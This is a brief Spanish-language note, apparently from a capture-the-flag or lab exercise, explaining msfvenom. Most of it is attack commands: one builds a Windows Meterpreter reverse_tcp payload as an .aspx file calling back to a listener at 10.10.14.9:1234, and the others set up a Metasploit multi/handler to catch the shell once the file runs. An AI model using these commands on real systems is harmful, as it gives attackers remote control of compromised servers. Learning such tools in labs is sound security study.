Es una combinación de un generador de paylods con un encoder.
la sintaxis
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx > devel2.aspx
msf exploit(multi/handler) > use multi/handler Y PONES EL MISMO PAYLOAD QUE HABIAS PUESTO msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp show options
y luego ejecutar el archivo y se conecta.